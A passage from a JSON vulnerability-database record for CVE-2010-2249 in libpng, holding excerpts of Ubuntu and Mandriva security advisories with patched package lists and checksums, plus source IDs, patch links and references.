http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_lpia.deb\n Size/MD5: 257350 fff93fe6a558aef20e20b8b8f15227e7\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_powerpc.udeb\n Size/MD5: 72524 8e92aaedc8e6fabafed81cca60a833e9\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_powerpc.deb\n Size/MD5: 173720 055336debc8a5b9ff92e6cae9998ac94\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_powerpc.deb\n Size/MD5: 264674 dbd6ca8bcdcf241c0629b7b27e0e1e5d\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_sparc.udeb\n Size/MD5: 67348 44b9c2989661e116d78b809a8657a5c8\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_sparc.deb\n Size/MD5: 168516 b98b4872db6f90caf0f43da67197dec0\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_sparc.deb\n Size/MD5: 257634 eb673ad114284bbd9be37e1c322e1bfb\n\nUpdated packages for Ubuntu 10.04:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.42-1ubuntu2.1.debian.tar.bz2\n Size/MD5: 19511 ac49d7354c1ab87a91dbad607733629f\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.42-1ubuntu2.1.dsc\n Size/MD5: 1299 dae31f78418d5db8c3476d7562859658\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.42.orig.tar.bz2\n Size/MD5: 670811 9a5cbe9798927fdf528f3186a8840ebe\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.42-1ubuntu2.1_all.deb\n Size/MD5: 926 602d7036448637b45c1eacbc31e05640\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.42-1ubuntu2.1_amd64.udeb\n Size/MD5: 74124 82cc493f2b3d80b10ccf3f9fa2ec4ff6\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.42-1ubuntu2.1_amd64.deb\n Size/MD5: 180006 3b5339fe77bcdae97bb2a318496a192e\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.42-1ubuntu2.1_amd64.deb\n Size/MD5: 271858 ae0c6a1e973dad2b0a0685fd863c096d\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.42-1ubuntu2.1_i386.udeb\n Size/MD5: 70692 b264bdd0086f3451e42df7f840ab894a\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.42-1ubuntu2.1_i386.deb\n Size/MD5: 176510 03c3d70135e907f21b2342972d8a9b40\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.42-1ubuntu2.1_i386.deb\n Size/MD5: 261728 955b40272944dd988ee39b62d8c6606c\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.42-1ubuntu2.1_powerpc.udeb\n Size/MD5: 73380 ad2cda1c89c55c473121da33a40294f6\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.42-1ubuntu2.1_powerpc.deb\n Size/MD5: 179272 b6623c3dcdc841a762308f889c8b478e\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.42-1ubuntu2.1_powerpc.deb\n Size/MD5: 271898 fcccfdb0eb4bc3a3470a83888f8bae28\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.42-1ubuntu2.1_sparc.udeb\n Size/MD5: 69258 ec2047ed5079933d6dbeb841a0207c59\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.42-1ubuntu2.1_sparc.deb\n Size/MD5: 175214 142020dfd126d2335bc93bad6a714799\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.42-1ubuntu2.1_sparc.deb\n Size/MD5: 265174 06843a4a028c5533e89d5562cbeb2047\n\n\n\n. Latest xulrunner and\n mozilla-thunderbird has been patched as a precaution for 2008.0 wheres\n on 2009.0 and up the the system libpng library is used instead of the\n bundled copy. htmldoc, xulrunner and mozilla-thunderbird packages is\n therefore also being provided with this advisory. \n \n Packages for 2008.0 and 2009.0 are provided as of the Extended\n Maintenance Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149\u0026products_id=490\n \n The updated packages have been patched to correct these issues. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6218\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Linux 2008.0:\n 4e91a2a256c61f52dffd4fb625e20cf8 2008.0/i586/htmldoc-1.8.27-1.2mdv2008.0.i586.rpm\n 71553205b1e31d2891667d2eab7aca14 2008.0/i586/htmldoc-nogui-1.8.27-1.2mdv2008.0.i586.rpm\n 75b6d3f905d7e94154902f81e4728963 2008.0/i586/libpng3-1.2.22-0.5mdv2008.0.i586.rpm\n fa0c81f2b544f65455a0e0420d9a0e56 2008.0/i586/libpng-devel-1.2.22-0.5mdv2008.0.i586.rpm\n d4d06a12fd8ee88295877e127757c64b 2008.0/i586/libpng-source-1.2.22-0.5mdv2008.0.i586.rpm\n 6687d56f95702f0e5786c885ab79c6a9 2008.0/i586/libpng-static-devel-1.2.22-0.5mdv2008.0.i586.rpm\n 546c18ed8ccf044a45dff3a8cd5ac5b7 2008.0/i586/libxulrunner1.9.2.6-1.9.2.6-0.2mdv2008.0.i586.rpm\n b428e1202d95d588fb3248c2b2fe8b2f 2008.0/i586/libxulrunner-devel-1.9.2.6-0.2mdv2008.0.i586.rpm\n b9541da4417ea1150c493aea591509bb 2008.0/i586/mozilla-thunderbird-3.0.5-0.2mdv2008.0.i586.rpm\n 3389caeeda8b8f272d0e5ed070f075b8 2008.0/i586/mozilla-thunderbird-enigmail-3.0.5-0.2mdv2008.0.i586.rpm\n 901abb46652fbc19c8e655895181a949 2008.0/i586/nsinstall-3.0.5-0.2mdv2008.0.i586.rpm\n ad221cd523bff8f4a59037aa05e1442b 2008.0/i586/xulrunner-1.9.2.6-0.2mdv2008.0.i586.rpm \n d3dbbb58c9832db4edbc45a4023b4477 2008.0/SRPMS/htmldoc-1.8.27-1.2mdv2008.0.src.rpm\n 885dba7fe0581b37de05d20b838f279a 2008.0/SRPMS/libpng-1.2.22-0.5mdv2008.0.src.rpm\n 358c49e17d4db735f6862fdbee95a1c9 2008.0/SRPMS/mozilla-thunderbird-3.0.5-0.2mdv2008.0.src.rpm\n 748ab46a19f1c32808bf3e79429f2211 2008.0/SRPMS/xulrunner-1.9.2.6-0.2mdv2008.0.src.rpm\n\n Mandriva Linux 2008.0/X86_64:\n 8b2eff5dd89f4ed7e3f120bbc31afa34 2008.0/x86_64/htmldoc-1.8.27-1.2mdv2008.0.x86_64.rpm\n 15460a7bce68e95d03a87eb14066728b 2008.0/x86_64/htmldoc-nogui-1.8.27-1.2mdv2008.0.x86_64.rpm\n c7577072f7ab2786a97d7df732b4299a 2008.0/x86_64/lib64png3-1.2.22-0.5mdv2008.0.x86_64.rpm\n fae36a86aa019cf0fcbcf0d15c508208 2008.0/x86_64/lib64png-devel-1.2.22-0.5mdv2008.0.x86_64.rpm\n 141ec56a2395ed150acc997eac851429 2008.0/x86_64/lib64png-static-devel-1.2.22-0.5mdv2008.0.x86_64.rpm\n a29c11e39685931084a085f5716afd5c 2008.0/x86_64/lib64xulrunner1.9.2.6-1.9.2.6-0.2mdv2008.0.x86_64.rpm\n 3a846b86c758be68420ef05e44cfe717 2008.0/x86_64/lib64xulrunner-devel-1.9.2.6-0.2mdv2008.0.x86_64.rpm\n 084f3b3d7c68806c7acfc7f3be701f0b 2008.0/x86_64/libpng-source-1.2.22-0.5mdv2008.0.x86_64.rpm\n c45f7479d93714c46d14f4ae2a5b76bd 2008.0/x86_64/mozilla-thunderbird-3.0.5-0.2mdv2008.0.x86_64.rpm\n 996e7a6a98997883236b08f6ec5816fa 2008.0/x86_64/mozilla-thunderbird-enigmail-3.0.5-0.2mdv2008.0.x86_64.rpm\n ecfdba6225b837a7a03c2ddf0d77d07f 2008.0/x86_64/nsinstall-3.0.5-0.2mdv2008.0.x86_64.rpm\n 394d8e8458e503ed10db7c7b7f742c2b 2008.0/x86_64/xulrunner-1.9.2.6-0.2mdv2008.0.x86_64.rpm \n d3dbbb58c9832db4edbc45a4023b4477 2008.0/SRPMS/htmldoc-1.8.27-1.2mdv2008.0.src.rpm\n 885dba7fe0581b37de05d20b838f279a 2008.0/SRPMS/libpng-1.2.22-0.5mdv2008.0.src.rpm\n 358c49e17d4db735f6862fdbee95a1c9 2008.0/SRPMS/mozilla-thunderbird-3.0.5-0.2mdv2008.0.src.rpm\n 748ab46a19f1c32808bf3e79429f2211 2008.0/SRPMS/xulrunner-1.9.2.6-0.2mdv2008.0.src.rpm\n\n Mandriva Linux 2009.0:\n 28b355727c0ef89be1955a18a8c4a1cf 2009.0/i586/libpng3-1.2.31-2.3mdv2009.0.i586.rpm\n bf33a24dc5144d0c2362e5c7432f9434 2009.0/i586/libpng-devel-1.2.31-2.3mdv2009.0.i586.rpm\n e331263b8ac75ddad94f6d9d06d9c802 2009.0/i586/libpng-source-1.2.31-2.3mdv2009.0.i586.rpm\n 921c4ed0268fcb932f52d299ea74a28c 2009.0/i586/libpng-static-devel-1.2.31-2.3mdv2009.0.i586.rpm \n c43df36b143f834aa7351eb6a9952897 2009.0/SRPMS/libpng-1.2.31-2.3mdv2009.0.src.rpm\n\n Mandriva Linux 2009.0/X86_64:\n a20b2965684ddb18b2818d618927bb9a 2009.0/x86_64/lib64png3-1.2.31-2.3mdv2009.0.x86_64.rpm\n df3bbf6f7e959aea3f6065c83ece5321 2009.0/x86_64/lib64png-devel-1.2.31-2.3mdv2009.0.x86_64.rpm\n 3c8e3469239f93a70ccbcf56ba55cfb6 2009.0/x86_64/lib64png-static-devel-1.2.31-2.3mdv2009.0.x86_64.rpm\n 740cd4b4cf0d39dd03a26f0b821cfee4 2009.0/x86_64/libpng-source-1.2.31-2.3mdv2009.0.x86_64.rpm \n c43df36b143f834aa7351eb6a9952897 2009.0/SRPMS/libpng-1.2.31-2.3mdv2009.0.src.rpm\n\n Mandriva Linux 2009.1:\n 127a1c180703d9c89f5f968d7262c469 2009.1/i586/libpng3-1.2.35-1.2mdv2009.1.i586.rpm\n 3bbf13f800dcbb5f4ab45ffe898f96ce 2009.1/i586/libpng-devel-1.2.35-1.2mdv2009.1.i586.rpm\n 2e369ee2602705f601d23a977c82ae8a 2009.1/i586/libpng-source-1.2.35-1.2mdv2009.1.i586.rpm\n 5784917823e881a4aa997276528bfabe 2009.1/i586/libpng-static-devel-1.2.35-1.2mdv2009.1.i586.rpm \n 6267ae8a72870fdd2a44962d987a6216 2009.1/SRPMS/libpng-1.2.35-1.2mdv2009.1.src.rpm\n\n Mandriva Linux 2009.1/X86_64:\n d6032db330f8b8b40af48b29fc6d3730 2009.1/x86_64/lib64png3-1.2.35-1.2mdv2009.1.x86_64.rpm\n 4aac775bc389d382f184d912ef50b0be 2009.1/x86_64/lib64png-devel-1.2.35-1.2mdv2009.1.x86_64.rpm\n fb792b3d38cf769590a2dde6ee74c755 2009.1/x86_64/lib64png-static-devel-1.2.35-1.2mdv2009.1.x86_64.rpm\n 0dfcb358ed06fe83e9621e06189aa8f9 2009.1/x86_64/libpng-source-1.2.35-1.2mdv2009.1.x86_64.rpm \n 6267ae8a72870fdd2a44962d987a6216 2009.1/SRPMS/libpng-1.2.35-1.2mdv2009.1.src.rpm\n\n Mandriva Linux 2010.0:\n 76ba7b51c3eda624850a8288bd182afa 2010.0/i586/libpng3-1.2.40-1.2mdv2010.0.i586.rpm\n 7a936f6a94f33f0e7ffc991ff7b4ed7f 2010.0/i586/libpng-devel-1.2.40-1.2mdv2010.0.i586.rpm\n abd9ee162933e3208918d3190c76c0af 2010.0/i586/libpng-source-1.2.40-1.2mdv2010.0.i586.rpm\n bae7010f8e07568c1a9b42e20e7ddebf 2010.0/i586/libpng-static-devel-1.2.40-1.2mdv2010.0.i586.rpm \n cc04ec15436b892a4e75f1ad18675fb6 2010.0/SRPMS/libpng-1.2.40-1.2mdv2010.0.src.rpm\n\n Mandriva Linux 2010.0/X86_64:\n 499b5e2707d19becfdab415a8008b122 2010.0/x86_64/lib64png3-1.2.40-1.2mdv2010.0.x86_64.rpm\n 166ca4d21e39bbb3f250806626c59154 2010.0/x86_64/lib64png-devel-1.2.40-1.2mdv2010.0.x86_64.rpm\n 1c4b4f2e79cf01a4388a2e395dd64cfa 2010.0/x86_64/lib64png-static-devel-1.2.40-1.2mdv2010.0.x86_64.rpm\n 88b678c1352aa3ed0fffb04241254128 2010.0/x86_64/libpng-source-1.2.40-1.2mdv2010.0.x86_64.rpm \n cc04ec15436b892a4e75f1ad18675fb6 2010.0/SRPMS/libpng-1.2.40-1.2mdv2010.0.src.rpm\n\n Mandriva Linux 2010.1:\n 349ec004acb579d4466b530bfd5fbf3d 2010.1/i586/libpng3-1.2.43-1.1mdv2010.1.i586.rpm\n d9e323791b16319728fe1486f819e59b 2010.1/i586/libpng-devel-1.2.43-1.1mdv2010.1.i586.rpm\n 3101d70a79c416392fe228d34b9ba6ff 2010.1/i586/libpng-source-1.2.43-1.1mdv2010.1.i586.rpm\n 2ff75d1339d52d859939d81994eae477 2010.1/i586/libpng-static-devel-1.2.43-1.1mdv2010.1.i586.rpm \n 0638fc23b9c5f1f7b3bcd0fdaf71bea8 2010.1/SRPMS/libpng-1.2.43-1.1mdv2010.1.src.rpm\n\n Mandriva Linux 2010.1/X86_64:\n 80e4392bbe0bd06b392216a6737cd37a 2010.1/x86_64/lib64png3-1.2.43-1.1mdv2010.1.x86_64.rpm\n 2d7d50b539c63cd1874ed8150d7fb84a 2010.1/x86_64/lib64png-devel-1.2.43-1.1mdv2010.1.x86_64.rpm\n 5c3793d0bc69db028ec214a6c9f67c1e 2010.1/x86_64/lib64png-static-devel-1.2.43-1.1mdv2010.1.x86_64.rpm\n 06b83b6f5050410eff5fe8a590972c18 2010.1/x86_64/libpng-source-1.2.43-1.1mdv2010.1.x86_64.rpm \n 0638fc23b9c5f1f7b3bcd0fdaf71bea8 2010.1/SRPMS/libpng-1.2.43-1.1mdv2010.1.src.rpm\n\n Corporate 4.0:\n be322ac5f446c26c2d0983a2d37e0c6c corporate/4.0/i586/htmldoc-1.8.23-8.2.20060mlcs4.i586.rpm\n 71329303eddfd4af0994a708bbe4a119 corporate/4.0/i586/htmldoc-nogui-1.8.23-8.2.20060mlcs4.i586.rpm\n 1c1036be9452042cd356349d6251b697 corporate/4.0/i586/libpng3-1.2.8-1.8.20060mlcs4.i586.rpm\n e9ba6c0c604a08f555d99503ba7adb68 corporate/4.0/i586/libpng3-devel-1.2.8-1.8.20060mlcs4.i586.rpm\n 288d9ca48ea58918bdff316891f3c474 corporate/4.0/i586/libpng3-static-devel-1.2.8-1.8.20060mlcs4.i586.rpm \n 3aa4084dfc51cf4e8ba252f89d53b220 corporate/4.0/SRPMS/htmldoc-1.8.23-8.2.20060mlcs4.src.rpm\n b2449f493949c397ac345027783c1216 corporate/4.0/SRPMS/libpng-1.2.8-1.8.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n f761706265fcbebd220b16542a742cc9 corporate/4.0/x86_64/htmldoc-1.8.23-8.2.20060mlcs4.x86_64.rpm\n 79b3189809ad9176401620a41aaa1fcd corporate/4.0/x86_64/htmldoc-nogui-1.8.23-8.2.20060mlcs4.x86_64.rpm\n e4f9ac99ff42fbc27aae3d8942903043 corporate/4.0/x86_64/lib64png3-1.2.8-1.8.20060mlcs4.x86_64.rpm\n e26042ead39ce63ed5f4700d2e61e260 corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.8.20060mlcs4.x86_64.rpm\n 609d6dc1b8a2b5afb029505469844c4f corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.8.20060mlcs4.x86_64.rpm \n 3aa4084dfc51cf4e8ba252f89d53b220 corporate/4.0/SRPMS/htmldoc-1.8.23-8.2.20060mlcs4.src.rpm\n b2449f493949c397ac345027783c1216 corporate/4.0/SRPMS/libpng-1.2.8-1.8.20060mlcs4.src.rpm\n\n Mandriva Enterprise Server 5:\n 282337fa9e11a04ef82464c7574591f4 mes5/i586/libpng3-1.2.31-2.3mdvmes5.1.i586.rpm\n 92c6ec861cf7da08a498576ba412e633 mes5/i586/libpng-devel-1.2.31-2.3mdvmes5.1.i586.rpm\n c9efa6abde763edff47bf0c1071c9f1a mes5/i586/libpng-source-1.2.31-2.3mdvmes5.1.i586.rpm\n 2f5340946610590a6baec42354868888 mes5/i586/libpng-static-devel-1.2.31-2.3mdvmes5.1.i586.rpm \n 488ece2aa6a2c4dc62d4c274d64c2926 mes5/SRPMS/libpng-1.2.31-2.3mdvmes5.1.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n e5f88951d2135de8587d4be94b405ce9 mes5/x86_64/lib64png3-1.2.31-2.3mdvmes5.1.x86_64.rpm\n 6b89da9eea105e65d7ae3c875c148473 mes5/x86_64/lib64png-devel-1.2.31-2.3mdvmes5.1.x86_64.rpm\n c1e6715410bbf2081187aef6749b0e3d mes5/x86_64/lib64png-static-devel-1.2.31-2.3mdvmes5.1.x86_64.rpm\n cb7ef533d9966c8b531cde8a661fc0af mes5/x86_64/libpng-source-1.2.31-2.3mdvmes5.1.x86_64.rpm \n 488ece2aa6a2c4dc62d4c274d64c2926 mes5/SRPMS/libpng-1.2.31-2.3mdvmes5.1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (GNU/Linux)\n\niD8DBQFMP2A1mqjQ0CJFipgRAjw5AKDRGlB7JGhhCobOgDXKWuKOu8Q43gCeOclX\nKlOM1C8b0XVNVFF83vXPz9A=\n=E10C\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2010-2249"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001805"
},
{
"db": "BID",
"id": "41174"
},
{
"db": "VULHUB",
"id": "VHN-44854"
},
{
"db": "VULMON",
"id": "CVE-2010-2249"
},
{
"db": "PACKETSTORM",
"id": "94522"
},
{
"db": "PACKETSTORM",
"id": "91973"
},
{
"db": "PACKETSTORM",
"id": "94244"
},
{
"db": "PACKETSTORM",
"id": "91619"
},
{
"db": "PACKETSTORM",
"id": "91878"
}
],
"trust": 2.52
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2010-2249",
"trust": 3.4
},
{
"db": "BID",
"id": "41174",
"trust": 2.9
},
{
"db": "SECUNIA",
"id": "40302",
"trust": 2.6
},
{
"db": "VUPEN",
"id": "ADV-2010-1612",
"trust": 2.5
},
{
"db": "SECUNIA",
"id": "40472",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "41574",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "42317",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "40547",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "42314",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "40336",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2010-2491",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1837",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1755",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-3046",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1877",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1637",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-3045",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1846",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1024723",
"trust": 1.7
},
{
"db": "XF",
"id": "59816",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001805",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201006-491",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-44854",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/1837",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/3046",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/3045",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/1612",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/2491",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/1637",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/1846",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/1877",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/1755",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2010-2249",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "94522",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "91973",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "94244",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "91619",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "91878",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-44854"
},
{
"db": "VULMON",
"id": "CVE-2010-2249"
},
{
"db": "BID",
"id": "41174"
},
{
"db": "PACKETSTORM",
"id": "94522"
},
{
"db": "PACKETSTORM",
"id": "91973"
},
{
"db": "PACKETSTORM",
"id": "94244"
},
{
"db": "PACKETSTORM",
"id": "91619"
},
{
"db": "PACKETSTORM",
"id": "91878"
},
{
"db": "CNNVD",
"id": "CNNVD-201006-491"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001805"
},
{
"db": "NVD",
"id": "CVE-2010-2249"
}
]
},
"id": "VAR-201006-0260",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-44854"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T22:45:33.190000Z",
"patch": {
"_id": null,
"data": [
{
"title": "HT4456",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4456"
},
{
"title": "HT4457",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4457"
},
{
"title": "HT4554",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4554"
},
{
"title": "HT4566",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4566"
},
{
"title": "HT4435",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4435"
},
{
"title": "HT4456",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4456?viewlocale=ja_JP"
},
{
"title": "HT4457",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4457?viewlocale=ja_JP"
},
{
"title": "HT4554",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4554?viewlocale=ja_JP"
},
{
"title": "HT4566",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4566?viewlocale=ja_JP"
},
{
"title": "HT4435",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4435?viewlocale=ja_JP"
},
{
"title": "libpng-1.2.10-7.1.3.0.1.AXS3",
"trust": 0.8,
"url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=1210"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.libpng.org/pub/png/libpng.html"
},
{
"title": "libpng-1.2.44-README",
"trust": 0.8,
"url": "http://www.libpng.org/pub/png/src/libpng-1.2.44-README.txt"
},
{
"title": "2078",
"trust": 0.8,
"url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=2078"
},
{
"title": "2079",
"trust": 0.8,
"url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=2079"
},
{
"title": "RHSA-2010:0534",
"trust": 0.8,
"url": "https://rhn.redhat.com/errata/RHSA-2010-0534.html"
},
{
"title": "multiple_vulnerabilities_in_libpng",
"trust": 0.8,
"url": "http://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_libpng"
},
{
"title": "VMSA-2010-0014",
"trust": 0.8,
"url": "http://www.vmware.com/security/advisories/VMSA-2010-0014.html"
},
{
"title": "libpng-1.4.1.tar.xz",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=216"
},
{
"title": "libpng-1.4.1.tar.gz",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=215"
},
{
"title": "linpng_txt.zip",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=219"
},
{
"title": "libpng-1.4.1.tar.bz2",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=214"
},
{
"title": "lpng141.zip",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=218"
},
{
"title": "lpng141.7z",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=217"
},
{
"title": "Debian CVElist Bug Report Logs: libpng: CVE-2010-1205 and CVE-2010-2249",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=184c5adf52ad398a58919ac7993ba9b9"
},
{
"title": "Ubuntu Security Notice: libpng vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-960-1"
},
{
"title": "Debian Security Advisories: DSA-2072-1 libpng -- several vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=3e96a347c5dea429ac96a3e5e90fb285"
},
{
"title": "VMware Security Advisories: VMware Workstation, Player, and ACE address several security issues.",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=b3571bd7da36d47dd9d3066ad9612f4c"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2010-2249"
},
{
"db": "CNNVD",
"id": "CNNVD-201006-491"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001805"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-401",
"trust": 1.1
},
{
"problemtype": "CWE-399",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-44854"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001805"
},
{
"db": "NVD",
"id": "CVE-2010-2249"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.7,
"url": "http://www.securityfocus.com/bid/41174"
},
{
"trust": 2.6,
"url": "http://secunia.com/advisories/40302"
},
{
"trust": 2.6,
"url": "http://www.vupen.com/english/advisories/2010/1612"
},
{
"trust": 2.1,
"url": "http://www.libpng.org/pub/png/libpng.html"
},
{
"trust": 1.8,
"url": "http://www.securitytracker.com/id?1024723"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/40336"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/40472"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/40547"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/41574"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/42314"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/42317"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/1637"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/1755"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/1837"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/1846"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/1877"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/2491"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/3045"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/3046"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2010//nov/msg00000.html"
},
{
"trust": 1.8,
